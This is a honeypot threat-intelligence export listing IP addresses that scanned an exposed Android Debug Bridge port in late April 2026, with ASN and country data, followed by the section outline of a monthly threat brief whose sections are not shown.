IPv4	91.231.89.15	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-29T02:08:51.000Z \| last_seen=2026-04-29T02:18:54.853Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	198.235.24.180	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-29T07:46:54.000Z \| last_seen=2026-04-29T07:58:28.987Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	170.64.214.225	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-29T08:21:51.000Z \| last_seen=2026-04-29T08:23:32.032Z \| ports=5555 \| cc=AU \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	61.239.126.176	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=HK; asn=9269; asn_org=Hong Kong Broadband Network Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-29T08:59:12.000Z \| last_seen=2026-04-29T09:00:20.641Z \| ports=5555 \| cc=HK \| asn=9269 \| org=Hong Kong Broadband Network Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	185.156.73.180	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-29T09:22:13.000Z \| last_seen=2026-04-29T09:23:20.278Z \| ports=5555 \| cc=UA \| asn=211736 \| org=FOP Dmytro Nedilskyi	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	223.70.251.26	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=56048; asn_org=China Mobile Communicaitons Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-29T14:31:52.000Z \| last_seen=2026-04-29T14:33:33.913Z \| ports=5555 \| cc=CN \| asn=56048 \| org=China Mobile Communicaitons Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	62.171.169.207	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=13 \| first_seen=2026-04-29T14:15:33.000Z \| last_seen=2026-04-30T19:23:11.297Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	64.62.197.109	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-29T14:30:07.000Z \| last_seen=2026-04-29T14:31:09.598Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	74.207.253.22	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-29T15:46:41.000Z \| last_seen=2026-04-29T15:47:46.280Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	143.198.178.253	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=6 \| first_seen=2026-04-29T16:23:54.000Z \| last_seen=2026-04-29T16:25:03.923Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	83.168.69.197	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=PL; asn=202520; asn_org=SkyPass Solutions Sp. z.o.o.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=9 \| first_seen=2026-04-29T19:50:32.000Z \| last_seen=2026-04-29T19:56:48.598Z \| ports=5555 \| cc=PL \| asn=202520 \| org=SkyPass Solutions Sp. z.o.o.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	185.226.197.43	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=PT; asn=21859; asn_org=Zenlayer Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-29T21:32:32.000Z \| last_seen=2026-04-29T21:33:43.024Z \| ports=5555 \| cc=PT \| asn=21859 \| org=Zenlayer Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	185.226.197.45	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=PT; asn=21859; asn_org=Zenlayer Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=8 \| first_seen=2026-04-29T21:33:57.000Z \| last_seen=2026-04-29T21:44:08.086Z \| ports=5555 \| cc=PT \| asn=21859 \| org=Zenlayer Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	94.154.35.122	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=NL; asn=202412; asn_org=Omegatech LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=21 \| first_seen=2026-04-29T21:08:10.000Z \| last_seen=2026-04-30T12:35:04.484Z \| ports=5555 \| cc=NL \| asn=202412 \| org=Omegatech LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-29
IPv4	106.34.132.153	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-30T02:39:42.000Z \| last_seen=2026-04-30T02:40:47.084Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	205.210.31.93	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=23 \| first_seen=2026-04-30T02:05:23.000Z \| last_seen=2026-04-30T02:16:51.754Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	85.11.183.23	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=GB; asn=201002; asn_org=PebbleHost Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=19 \| first_seen=2026-04-30T02:10:13.000Z \| last_seen=2026-04-30T02:20:45.638Z \| ports=5555 \| cc=GB \| asn=201002 \| org=PebbleHost Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	51.77.165.232	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=16276; asn_org=OVH SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-30T06:44:43.000Z \| last_seen=2026-04-30T06:46:21.250Z \| ports=5555 \| cc=FR \| asn=16276 \| org=OVH SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	207.154.207.215	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=17 \| first_seen=2026-04-30T09:45:09.000Z \| last_seen=2026-04-30T09:58:24.446Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	109.123.117.246	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=GB; asn=13213; asn_org=Thg Hosting Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-30T10:46:14.000Z \| last_seen=2026-04-30T10:47:16.708Z \| ports=5555 \| cc=GB \| asn=13213 \| org=Thg Hosting Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	157.230.179.248	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-30T10:39:00.000Z \| last_seen=2026-04-30T10:40:03.697Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	3.101.23.204	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=US; asn=16509; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=11 \| first_seen=2026-04-30T10:46:19.000Z \| last_seen=2026-04-30T10:56:33.047Z \| ports=5555 \| cc=US \| asn=16509 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	65.49.1.215	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-30T11:15:38.000Z \| last_seen=2026-04-30T11:16:39.466Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	139.59.233.191	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=18 \| first_seen=2026-04-30T12:29:47.000Z \| last_seen=2026-04-30T12:40:02.030Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	172.234.192.95	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=5 \| first_seen=2026-04-30T15:47:02.000Z \| last_seen=2026-04-30T15:48:06.456Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	65.49.1.38	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-30T15:01:23.000Z \| last_seen=2026-04-30T15:11:27.726Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	65.49.1.49	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=4 \| first_seen=2026-04-30T15:01:00.000Z \| last_seen=2026-04-30T15:02:10.257Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	194.163.134.126	Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=1 \| first_seen=2026-04-30T18:44:43.941Z \| last_seen=2026-04-30T18:44:43.941Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	23.240.197.167	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=20001; asn_org=Charter Communications Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=7 \| first_seen=2026-04-30T19:12:33.000Z \| last_seen=2026-04-30T19:22:42.375Z \| ports=5555 \| cc=US \| asn=20001 \| org=Charter Communications Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30
IPv4	146.70.224.22	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=HK; asn=9009; asn_org=M247 Europe SRL; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-04. events=22 \| first_seen=2026-04-30T21:09:46.000Z \| last_seen=2026-04-30T21:20:19.454Z \| ports=5555 \| cc=HK \| asn=9009 \| org=M247 Europe SRL	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-04-30

ADB lure on 5555 with the telemetry laid bare.

April 2026 Pulse

Robert's April 2026 brief

1. EXECUTIVE SUMMARY

2. KEY STATISTICS

2.1 Top 20 Attacking IPs

2.2 Top ASNs by Threat Context

2.3 Protocol/Payload Distribution

2.4 Geographic Breakdown

3. CAMPAIGN NARRATIVE

Campaign A: "The Trinity Cryptojacking Shitshow"

Campaign B: "Mirai's Identity Crisis (0cl / Boatnet)"

Campaign C: "The Fbot Vigilante Crusade"

4. INFRASTRUCTURE DEEP DIVE

4.1 Bulletproof Hall of Shame

4.2 Cloud Infrastructure Abuse

4.3 Residential/IoT Botnet Sources

4.4 Research Scanners

5. MALWARE AND BEHAVIOR ANALYSIS

The Trinity Toolkit (com.ufo.miner)

Mirai / 0cl Variants (parm7)

Fbot ("The Cleaner")

6. MITRE ATT&CK MAPPING

7. DETECTION AND MITIGATION

7.1 Hardening Recommendations

7.2 Firewall Rules

7.3 SIEM Queries

7.4 IDS/IPS Signatures

7.5 YARA Rules

8. IOC APPENDIX (The Block List)

8.1 Critical C2/Payload Servers (Immediate Block Priority)

8.2 Top Attacking IPs (Aggressive Scanners & P2P Nodes)

8.3 File Hashes (SHA256)

8.4 Malicious URLs/Domains

9. CLOSING THOUGHTS

Threat intelligence export

The Trinity Toolkit (`com.ufo.miner`)

Mirai / 0cl Variants (`parm7`)